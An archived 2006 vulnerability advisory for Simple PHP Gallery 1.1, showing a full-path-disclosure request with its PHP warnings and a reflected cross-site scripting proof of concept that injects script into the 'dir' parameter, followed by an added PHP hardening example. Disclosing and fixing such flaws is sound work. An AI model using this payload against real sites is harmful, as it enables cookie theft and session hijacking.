Securityvulns SECURITYVULNS:DOC:15207
Nov 25, 2006 - 12:00 a.m.

Cross site scripting & fullpath disclosure


+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+Credit by : Al7ejaz Hacker
+
+Script : Simple PHP Gallery 1.1
+Impact : Cross site scripting & fullpath disclosure
+
+
+Fullpath disclosure :
+
+http://localhost/sp_index.php?dir=[Somthingwrong]
+
+Result
+
+
+Warning: opendir(123): failed to open dir: No such file or directory in /var/www/html/gallery/sp_helper_functions.php on line 10
+
+Warning: readdir(): supplied argument is not a valid Directory resource in /var/www/html/gallery/sp_helper_functions.php on line 11
+
+Warning: Invalid argument supplied for foreach() in /var/www/html/gallery/sp_def_vars.php on line 147
+
+
+
+
+Cross Site Scripting
+
+
+
+The dir variable is not properly verified and can be used to execute HTML and JavaScript code
+
+http://localhost/sp_index.php?dir=<script>alert(document.cookie)</script>
+
+/Milw0rm
+
+
+in subject hot : Cross site scripting & fullpath disclosure ;)
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
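
A defensive sketch of how the `dir` parameter could be handled so that neither issue above occurs. This is an added example, not code from Simple PHP Gallery or from the advisory's author; `GALLERY_ROOT`, `resolve_gallery_dir()` and `h()` are hypothetical names, and the image root path is an assumption.

```php
<?php
declare(strict_types=1);
// Added example, not Simple PHP Gallery code. GALLERY_ROOT and both helper
// names are assumptions; only the `dir` parameter comes from the advisory.
const GALLERY_ROOT = '/var/www/html/gallery/images'; // assumed image root

// Keep PHP warnings (and the filesystem paths in them) out of responses.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

// Return the canonical path of $requested under $root, or null if invalid.
function resolve_gallery_dir(string $root, string $requested): ?string
{
    $base = realpath($root);
    if ($base === false || strpos($requested, "\0") !== false) {
        return null;
    }
    // realpath() is false for missing paths, so a bad value never reaches
    // opendir()/readdir() and never triggers their warnings.
    $full = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($full === false || !is_dir($full)) {
        return null;
    }
    // Reject anything that resolves outside the gallery root (../ etc.).
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($full !== $base && strncmp($full, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $full;
}

// HTML-escape a value before it is echoed into the page.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// dir[]=x arrives as an array, so anything that is not a string is dropped.
$requested = is_string($_GET['dir'] ?? null) ? $_GET['dir'] : '';
$dir = resolve_gallery_dir(GALLERY_ROOT, $requested);
if ($dir === null) {
    http_response_code(404);
    echo '<p>Gallery not found: ' . h($requested) . '</p>';
    exit;
}
echo '<h1>' . h($requested) . '</h1><ul>';
foreach (scandir($dir) ?: [] as $name) {
    if ($name[0] !== '.') { echo '<li>' . h($name) . '</li>'; }
}
echo '</ul>';
```

Setting `display_errors = Off` in the production `php.ini` covers the path disclosure for any other warning the script may raise, independent of this check.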